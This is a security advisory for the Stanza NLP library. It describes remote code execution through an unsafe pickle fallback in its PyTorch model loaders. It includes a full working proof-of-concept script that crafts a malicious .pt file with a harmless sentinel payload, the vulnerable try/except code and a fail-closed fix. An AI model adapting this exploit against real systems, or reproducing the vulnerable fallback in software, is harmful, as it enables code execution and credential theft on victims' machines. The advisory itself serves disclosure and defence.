GHSA-v5jw-96jm-7h2c
Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders
Details
### Summary
Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using `torch.load(..., weights_only=True)`, but automatically falls back to the fully unsafe `torch.load(..., weights_only=False)` when the safe load raises `pickle.UnpicklingError`. Because the `UnpicklingError` condition is fully attacker-controllable, any `.pt` file that contains a single unsupported pickle global will trigger it.
An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline.
Code execution occurs inside the Stanza pretrain-loading API, not merely by calling `torch.load` directly.
### Details
The vulnerable code is in [pretrain.py#L59-L67](https://github.com/stanfordnlp/stanza/blob/main/stanza/models/common/pretrain.py#L59-L67) (Stanza 1.12.0):
```python try: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True) except UnpicklingError: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False) ```
When `weights_only=True` is passed, PyTorch's deserializer raises `pickle.UnpicklingError` for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the **same attacker-controlled file** with `weights_only=False`, which invokes Python's full pickle deserializer and executes any `__reduce__` method in the file without restriction.
The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., `builtins.open`) anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.
**The same try/except pattern exists in at least five additional loaders in Stanza 1.12.0:**
| File | Lines | |------|-------| | `stanza/models/common/pretrain.py` | 64–66 | | `stanza/models/coref/model.py` | 251–253, 329–331 | | `stanza/models/classifiers/trainer.py` | 80–82 | | `stanza/models/constituency/base_trainer.py` | 94–96 |
Additionally, `stanza/models/lemma_classifier/base_model.py:127` calls `torch.load(filename, lambda storage, loc: storage)` with no `weights_only` argument at all, which defaults to `False` on any PyTorch < 2.6.
The call chain from the public API to the vulnerable fallback is:
``` stanza.models.common.foundation_cache.load_pretrain(path) → FoundationCache.load_pretrain(path) → stanza.models.common.pretrain.Pretrain(filename) → Pretrain.emb (property access triggers load) → Pretrain.load() → torch.load(..., weights_only=True) # raises UnpicklingError → torch.load(..., weights_only=False) # executes arbitrary pickle ```
---
### PoC
**Environment:** Python 3.11, `stanza==1.12.0`, `torch==2.12.0`
**Step 1: Install dependencies:** ```bash pip install stanza==1.12.0 torch==2.12.0 ```
**Step 2: Save the following as `exploit.py`:**
```python import os from pathlib import Path
import torch import stanza from stanza.models.common.foundation_cache import FoundationCache, load_pretrain from stanza.models.common.vocab import VOCAB_PREFIX
SENTINEL = "/tmp/stanza_rce_proof" MODEL = "/tmp/stanza_malicious.pt"
class HarmlessPayload: """Demonstrates execution; writes a sentinel file.""" def __init__(self, path): self.path = path def __reduce__(self): return (open, (self.path, "w"))
# Build a structurally valid Stanza pretrain state dict with the payload embedded. words = VOCAB_PREFIX + ["hello"] state = { "vocab": { "lang": "", "idx": 0, "cutoff": 0, "lower": False, "_id2unit": words, "_unit2id": {w: i for i, w in enumerate(words)}, }, "emb": torch.zeros((len(words), 2), dtype=torch.float32), "payload": HarmlessPayload(SENTINEL), # ← the malicious object } torch.save(state, MODEL)
# Confirm safe-only load raises UnpicklingError and does NOT create sentinel. try: torch.load(MODEL, lambda s, l: s, weights_only=True) print("UNEXPECTED: safe load succeeded (no fallback needed)") except Exception as e: print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")
# Load through the real Stanza API. The fallback fires and the sentinel is created. cache = FoundationCache() pretrain = load_pretrain(MODEL, foundation_cache=cache)
print(f"stanza={stanza.__version__} torch={torch.__version__}") print(f"emb_shape={tuple(pretrain.emb.shape)}") print(f"sentinel_exists={Path(SENTINEL).exists()}") print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN") ```
**Step 3 : Run:** ```bash python exploit.py ```
**Expected output (confirmed):** ``` Control: safe load raised UnpicklingError : sentinel exists: False stanza=1.12.0 torch=2.12.0 emb_shape=(5, 2) sentinel_exists=True VERDICT: ACTUAL_VULN_REAL_STANZA_PATH ```
The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback : not by a direct `torch.load` call in the PoC.
---
### Impact
**Vulnerability class:** CWE-502 : Deserialization of Untrusted Data
**Who is impacted:** Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely:
- Developers who run `stanza.Pipeline(lang)` after downloading models from HuggingFace or GitHub - CI pipelines that automatically refresh Stanza models during builds - Research environments that share pretrain files over shared network storage or model repositories
**Attack prerequisites:** The attacker must be able to place a malicious `.pt` pretrain file at a path that Stanza will load. Realistic delivery vectors include: - Compromise of a HuggingFace model repository hosting Stanza pretrain weights - Poisoning of a shared model cache directory (NFS, S3, artifact store) - A malicious pretrain file distributed via a third-party fine-tuning hub or research repo
**What an attacker achieves:** Arbitrary code execution with the full privileges of the process running `stanza.Pipeline()`, typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.
**Recommended fix:**
Remove the unsafe fallback entirely. If `weights_only=True` raises `UnpicklingError`, fail closed:
```python try: data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True) except UnpicklingError as e: raise RuntimeError( f"Refusing to load legacy pretrain file {self.filename!r} with unsafe " "deserialization. Regenerate the file using a trusted Stanza migration tool." ) from e ```
If legacy NumPy-containing pretrain files must be supported, use PyTorch's `add_safe_globals()` API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.
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